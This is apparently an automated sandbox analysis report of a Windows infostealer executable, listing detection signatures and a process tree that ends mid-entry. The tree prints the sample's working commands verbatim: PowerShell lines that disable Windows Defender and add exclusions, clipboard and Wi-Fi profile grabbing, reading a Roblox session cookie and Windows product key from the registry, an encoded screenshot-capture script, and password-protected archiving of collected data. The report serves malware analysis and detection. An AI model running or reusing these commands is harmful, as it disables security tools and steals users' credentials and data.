Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-11-2024 13:40

General

  • Target

    bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe

  • Size

    6.9MB

  • MD5

    8a58a903d1863c9e42266e3b668214aa

  • SHA1

    d00001e87ac7b354d995671999a1e71ad3a8a6b1

  • SHA256

    bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103

  • SHA512

    5aa75b2d1421df6dbc95adc2040f8c3b462cc78656d2be4175b8feb44409668d2dff367de11ebec050660a098e77f89e87e91d0786c385a77008b2250b57408b

  • SSDEEP

    98304:kVpTDjWM8JEE1FKamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIs:OT0heNTfm/pf+xk4dWRpmrbW3jmr2

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe
    "C:\Users\Admin\AppData\Local\Temp\bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Users\Admin\AppData\Local\Temp\bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe
      "C:\Users\Admin\AppData\Local\Temp\bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5052
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3204
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4576
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2164
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4320
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:392
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2516
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2028
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3044
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:3640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:4092
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4744
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2132
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ck3c0eum\ck3c0eum.cmdline"
                5⤵
                  PID:1476
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB333.tmp" "c:\Users\Admin\AppData\Local\Temp\ck3c0eum\CSC575E2F8E441D4AADBD250BBB3A0B284.TMP"
                    6⤵
                      PID:3808
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3040
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2184
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4384
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2460
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                      PID:1328
                      • C:\Windows\system32\attrib.exe
                        attrib -r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:4368
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2696
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4860
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:5008
                            • C:\Windows\system32\attrib.exe
                              attrib +r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:224
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:972
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:3248
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:5044
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2440
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:3780
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:4892
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:3188
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1140
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:2764
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1220
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:4532
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:2368
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\jg6wc.zip" *"
                                              3⤵
                                                PID:4116
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI27002\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI27002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\jg6wc.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:1504
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:2212
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1748
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:720
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:1008
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:100
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:4236
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:4652
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1424
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:4600
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:2184
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:3252
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
